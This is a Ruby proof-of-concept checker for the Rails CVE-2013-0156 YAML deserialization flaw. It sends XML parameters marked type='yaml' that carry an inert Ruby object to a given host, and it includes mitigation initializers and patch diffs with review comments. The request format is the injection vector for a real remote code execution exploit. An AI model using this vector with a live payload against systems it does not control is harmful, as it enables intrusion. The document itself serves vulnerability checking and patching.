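# CVE-2013-0156 Proof-of-Concept
# Public Domain (ofc)
#
# - vjt@openssl.it
#
# What this checks: whether the target Rails app still honours the
# type="yaml" attribute on XML parameters, i.e. whether it hands attacker
# supplied request content to YAML.load. The probe document is an empty
# `!ruby/object {}` - it carries no code and does nothing when loaded, so
# the check is safe to run against a live system. The outcome is only
# visible in the *target application's log*, so run it against a host you
# operate and whose logs you can read.

require 'rubygems'
require 'restclient'
require 'builder'
require 'yaml'

# The YAML document embedded in both probes ("--- !ruby/object {}\n").
PROBE_YAML = Object.new.to_yaml

# Build the trigger XML: the YAML document nested under a hash element,
# passed as the element's attributes (type + __content__).
def probe_xml_nested(yaml)
  x = Builder::XmlMarkup.new
  x.instruct!
  x.hash do
    x.foo 'type' => 'yaml', '__content__' => yaml
  end.to_s
end

# Build the trigger XML: the YAML document as the text of a single
# top-level element carrying type="yaml".
def probe_xml_flat(yaml)
  x = Builder::XmlMarkup.new
  x.instruct!
  x.foo(yaml, :type => 'yaml')
end

xml  = probe_xml_nested(PROBE_YAML)
xml2 = probe_xml_flat(PROBE_YAML)

# Post it to your app. If you see
#
#   Parameters: {"hash"=>{"foo"=>#...}, ...}
#
# i.e. an inspected Object instance (class name and address) instead of a
# string - then YOU ARE VULNERABLE. Apply the Rails patches IMMEDIATELY:
# https://groups.google.com/forum/#!topic/rubyonrails-security/61bkgvnSGTQ/discussion
#
# For live, production systems, two initializers are included at the end of
# this file (after __END__). They remove the 'yaml' and 'symbol' XML type
# handlers, so typed XML parameters come through as plain strings.
#
# If you see
#
#   Parameters: {"hash"=>{"foo"=>"--- !ruby/object {}\n"}, ...}
#
# you are NOT vulnerable - and you can sleep safe. :-)
#
host = ARGV[0]
abort "Usage: #$0 HOST" unless host

puts "POSTing to #{host}"

# Both requests are best-effort: a non-2xx reply is expected (the app may
# well reject the XML and the signal is in its log, not the response). A
# connection-level failure, however, is reported rather than swallowed by a
# bare `rescue nil`, so a mistyped HOST or a refused connection cannot be
# mistaken for a completed check.
[xml, xml2].each do |body|
  begin
    RestClient.post host, body, :content_type => :xml
  rescue StandardError => e
    warn "#{e.class}: #{e.message}"
  end
end

__END__
# Rails 3.0 - 3.2
#
ActiveSupport::XmlMini::PARSING.delete('symbol')
ActiveSupport::XmlMini::PARSING.delete('yaml')

# Rails 2.0 - 2.3
#
ActiveSupport::CoreExtensions::Hash::Conversions::XML_PARSING.delete('symbol')
ActiveSupport::CoreExtensions::Hash::Conversions::XML_PARSING.delete('yaml')

# Older - you're screwed
#
diff --git a/vendor/rails/actionpack/lib/action_controller/cgi_ext/cgi_methods.rb b/vendor/rails/actionpack/lib/action_controller/cgi_ext/cgi_methods.rb
index b069667..a6162a7 100755
--- a/vendor/rails/actionpack/lib/action_controller/cgi_ext/cgi_methods.rb
+++ b/vendor/rails/actionpack/lib/action_controller/cgi_ext/cgi_methods.rb
@@ -51,8 +51,6 @@ class CGIMethods #:nodoc:
 strategy.call(raw_post_data)
 when :xml_simple
 raw_post_data.blank? ? {} : Hash.from_xml(raw_post_data)
- when :yaml
- YAML.load(raw_post_data)
 when :xml_node
 node = XmlNode.from_xml(raw_post_data)
 { node.node_name => node }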
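Review bot: Dropping the `when :yaml` strategy closes only the direct YAML-body path; the `when :xml_simple` branch two lines above still hands the raw body to `Hash.from_xml`, whose typecasting honours `type="yaml"` on elements, so this hunk is not a complete fix on its own and has to be applied together with the conversions.rb hunk that follows. The `case` being edited continues past the hunk, so what a `:yaml` request now falls through to (an `else` that raises, or one that yields an empty hash) is not visible here; it is worth confirming the request is rejected loudly rather than silently parsed as an empty parameter set. A one-line comment at the removal site, `# :yaml strategy removed (CVE-2013-0156): YAML.load on a request body instantiates arbitrary objects`, would keep a later merge from reintroducing the branch.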
diff --git a/vendor/rails/activesupport/lib/active_support/core_ext/hash/conversions.rb b/vendor/rails/activesupport/lib/active_support/core_ext/hash/conversions.rb
index bbfc250..b0d1cc6 100644
--- a/vendor/rails/activesupport/lib/active_support/core_ext/hash/conversions.rb
+++ b/vendor/rails/activesupport/lib/active_support/core_ext/hash/conversions.rb
@@ -130,7 +130,6 @@ module ActiveSupport #:nodoc:
 when "boolean" then content.strip == "true"
 when "datetime" then ::Time.parse(content).utc
 when "date" then ::Date.parse(content)
- when "yaml" then YAML::load(content) rescue content
 else content
 end
 else
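Review bot: With the `when "yaml"` case removed, a `type="yaml"` element now reaches `else content` and comes back as the raw string, which is exactly the "not vulnerable" log line the probe at the top of this page looks for; however, if this `case` also has a `when "symbol"` branch (it is outside the hunk, so I cannot see it), that branch still turns attacker-chosen strings into symbols, and the initializers earlier on the page delete both 'yaml' and 'symbol' for that reason, so removing it here too would keep the two fixes consistent. The `::Date.parse` and `::Time.parse` branches likewise run on unbounded request content; the commit does not touch them, but a length cap on `content` before those calls is a cheap guard. The enclosing method starts and ends outside the hunk.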